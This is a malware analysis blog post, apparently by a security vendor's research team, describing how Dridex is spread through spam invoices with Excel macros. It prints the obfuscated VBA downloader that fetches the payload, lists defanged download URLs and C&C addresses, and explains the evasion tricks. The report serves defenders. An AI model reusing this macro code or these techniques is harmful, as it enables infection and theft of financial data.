Analysis of Dridex Malware Distribution Method Armed with Bypass Detection

Dridex, also known as Cridex and Bugat, is a typical info-stealing malware that steals financial information. It is distributed on a massive scale by cybercrime organizations and it mainly uses macros within Microsoft Office Word or Excel document files that are included in spam mails. The most noticeable characteristic of Dridex malware is that it operates by modularizing files depending on features such as downloader, loader, and botnet. As such, there have been cases of ransomwares such as DoppelPaymer or BitPaymer being distributed using Dridex malware. It has been found that the attacker group, which creates and distributes Dridex malware, and the group that distributes ransomware overlap quite significantly judging from the codes and distribution methods.[1][2][3]

The ASEC analysis team analyzed how the malware is downloaded from spam mails and Microsoft Office Excel document files. The attacker has been rapidly responding to variants to not get detected by the AV products and used various automatic bypass detection methods.

Spam Mail

The collected e-mail was written in English and appears to have targeted global receivers. The title and texts within the document include texts such as ‘Freight Statement Of Outstanding As Of 03_29_2021’ and ‘Ocean Freight overdue invoice Of 03_29_2021,’ disguised as a ‘statement,’ ‘estimate,’ ‘invoice,’ or ‘overdue payment statement.’ These titles are similar to those of spam mails distributed in Korea. The mail had an Excel file attached.

Excel file

The excel document contains a blurry image which prompts the user to click it. The included images are connected with the VBA macro code. Upon clicking them, the macro code function ‘VIEW_DOCUMENT’ is immediately run. It is not a macro that is automatically run such as Auto_Open, instead, certain area must be clicked in order to be executed. For that reason, it is difficult to run normally in the automated analysis sandbox.

The document also has hidden sheets. The two hidden sheets are XLM macro sheets. The attacker used both VBA and the XLM macro codes. The VBA code refers to the XLM macro code to operate. Such an operation method makes it difficult to find out the features by simply looking at the VBA or XLM macro sheet codes, and detecting based on specific area codes becomes difficult as well.

The attacker made it impossible to check the VBA codes by adding a password on the VBA Project. Tool such as oletools  can be used to extract VBA codes, but it is difficult to figure out what the feature is just by looking at the obfuscated codes shown below. The attacker is highly likely to have used VBA Project Locker such as Evilclippy.

#If VBA7 And Win64 Then
    Private Declare PtrSafe Function line_shipping Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As LongPtr, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As LongPtr, _
        ByVal lpfnCB As LongPtr _
      ) As Long
#Else
    Private Declare Function line_shipping Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As Long, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As Long, _
        ByVal lpfnCB As Long _
      ) As Long
#End If

Function re_re_order()
n = Cells(2, 1): nn = Sheets(2).Cells(2, 1)
For u = 1 To Len(n)
de = de & Chr(Asc(Mid(n, u, 1)) + Mid(nn, u, 1))
Next
re_re_order = de
End Function
Function next_shipment(cc As Variant) As Variant
next_shipment = Split(cc, "" & "--")
End Function
Function merridians_us()
merridians_us = "T1:T3"
End Function
Sub VIEW_DOCUMENT()
Sheets(1).Cells(3, 1).Name = "Line" & "_and"
doc_an = Split(re_re_order, "HH" & "HH")
P_prints = next_shipment(doc_an(1))
For oo = 0 To UBound(P_prints) - LBound(P_prints) + 1
On Error Resume Next
op_price (P_prints(oo))
Run ("Line" & "_and")
If oo = 12 Then last_cargo = insure_d:
If oo = 14 Then
rest_bags = insure_d
line_shipping 0, sgs_assure(for_clients_d(Split(doc_an(0), "D" & ","))), last_cargo & "\" & rest_bags, 0, 0
End If
Next
End Sub
Function op_price(jj As String)
Sheets(vbNull).Cells(3, 1).value = "=" & jj
End Function
Function for_clients_d(Mk As Variant) As String
Randomize: tg = xlArrangeStyleTiled
f = UBound(Mk) + tg
for_clients_d = Mk(Int((f) * Rnd))
End Function

Function insure_d()
insure_d = Sheets(vbNull).Cells(2, 20)
End Function

Public Function sgs_assure(fg As String)
sgs_assure = "ht" & "t" & "p" & "s://" & fg
End Function

Upon debugging the VBA macro code, we can see that it is referencing the cell of XLM macro sheet and using it as data. The data is used for the process of creating codes for external URL connection, which are the final feature of the excel document file. A total of 57 URLs are created, and multiple unobfuscations are needed in this process. Below is the list of URLs that the excel file connects to. (Do not connect or download)

After creating the URL list, the document connects to a random address and attempts to download a file. Because there are many addresses that can be connected, the success probability of an attack is high even when some addresses are blocked. The downloaded file is a DLL executable (Portable Executable), but it uses a compressed file extension such as .rar, .tar, or .zip instead of the dll file extension. It is assumed that this extension is used to not to have the file blocked during the suspicious activity detection of downloading an executable. The downloaded file is saved as a fixed DLL file name. These DLL files are Dridex Loader malware.

hxxps://tencoconsulting.com/klcpk3.rar
hxxps://abad.tv/gmrgbkv.rar
hxxps://nedkellymyanmar.com/l76db8k.rar
hxxps://myloanexpert.in/exxuia66v.tar
hxxps://aps-scribe.com/ptdgv53.rar
hxxps://sivmedia.dk/z18n7do.rar
hxxps://14karatvisions.com/rh1trnt.rar
hxxps://plataformas.datasiswebcontable.com/ek2lqm2.zip
hxxps://reseller.itechbrasil.com/xwpr9m9.tar
hxxps://estudiodedanzaesperanzadelosreyes.com/pi4omy.rar
hxxps://sadmahfuneralservices.co.za/jke1xnf7b.rar
hxxps://engagedmarketingmedia.com/mt42qiyn.rar
hxxps://disinfection-cleaning.co.za/sc25xty.zip
hxxps://cacaoprojects.com/asse9e3x.rar
hxxps://blog.difusodesign.com/vzsfnw3rk.rar
hxxps://v2consultores.com/gaiqb3.zip
hxxps://sabihasart.com/ltxd9207y.zip
hxxps://cpanel.shivay.net/ak5kpl1.zip
hxxps://kaptaanchapal.com/hrloamk3.zip
hxxps://www.estatebroker.in/cc5qg9x.tar
hxxps://thediasporianexperience.com/vh3r0pn.tar
hxxps://bioskey.com/w9jii4e1h.rar
hxxps://mediawaysnews.com/idn75myb.rar
hxxps://community.reimclub.com/ezmumkw.rar
hxxps://nxtnet.ga/oszxyd.tar
hxxps://aps-sv.com/lse6o3.rar
hxxps://masterthedaybook.com/hp8v4p3.rar
hxxps://goldenasiacapital.com/pqyxgi.rar
hxxps://ist-security.com/nz3wx4.rar
hxxps://addictionmusic.in/lloaynxsp.tar
hxxps://hchfug.org/oikz5qpn.tar
hxxps://gifsnow.fun/jta343i.rar
hxxps://preescolarmamagansa.edu.mx/uo0j4ls.rar
hxxps://patriotsupremehemp.com/j1jgt4g.rar
hxxps://dev.tunepushr.com/s6c1tl.zip
hxxps://canadianwork.cc/ugeepbmvc.zip
hxxps://cuetzalanlaesencia.com/ehvmx3.tar
hxxps://kienology.com/cepzd8r.zip
hxxps://elbauldenora.com/yknyy9.tar
hxxps://sexologistpakistan.net/e2xlnbik.rar
hxxps://cardilicores.com/ak9zjb.zip
hxxps://www.bizztradingbot.nl/w1em533ne.tar
hxxps://connectcapital.com.br/sum9e8.zip
hxxps://www.pkbacademy.ro/hlinx9.tar
hxxps://movix.net.br/stwv7a9u.rar
hxxps://business2.softberg.ro/knyiq6pg.tar
hxxps://rajeshtailang.com/qksnefw1t.tar
hxxps://anadelgbt.org/n5gi2o1l9.tar
hxxps://www.neslininsayfasi.site/clbqztx8.tar
hxxps://erp.nanotechproautocare.com/umxzvfog.rar
hxxps://www.mitsuiaccounting.com/nsyii02fi.rar
hxxps://drpayalphysiotherapy.in/iuqc13o2.zip
hxxps://spiritualroot.org/yqcsymrnj.rar
hxxps://robthetoolman.com.au/tni7p1y.zip
hxxps://hospedagem.pro/nnkwzi2he.zip
hxxps://rajib.pw/twd3dkz41.tar
hxxps://citihits.lk/iccdupr.rar

If the file is successfully downloaded, it runs the obfuscated CALL function as shown above. This is a command which runs the downloaded Dridex DLL file using the Regsvr32.exe process. If this process is run, Dridex malware is loaded in the Regsvr32.exe process and operates in the system.

Dridex DLL

Dridex DLL file operates after going through a very complicated code creation and unpacking process. It repeats memory allocation and deallocation, code injection, and grant execution privilege process to newly create the key loader file PE in memory. The key loader file itself does not have its code changed much. Connecting to the C&C server below is the core feature. The user’s information such as system information is sent in this process.

hxxs://210.65.244.176/
hxxps://37.34.58.210:6601/
hxxps://210.65.244.176/

This blog has introduced how Dridex malware is distributed, starting from the spam mail to the Dridex DLL loader. In the automated sandbox environment, it is difficult to run starting from spam mail to DLL file. Excel and DLL files change their formats quickly, therefore responding with a signature is difficult. AhnLab products detect and block the malware starting from the spam mail distribution to the Dridex DLL file using the following aliases.

[File Detection]
Downloader/VBA.Generic
Downloader/MSExcel.Generic
Trojan/Win32.Dridex.R353686
Trojan/Win.Agent.C4398254

[Behavior Detection]
Malware/MDP.Behavior.M3664

[IOC]
0801368e0e80ba88daad52d7e5977d22
3479d48fef3fa742d91e84705ff4f882
6bd0ae7a5d92e2d47c1cb6cbdc7d47c6

5 3 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments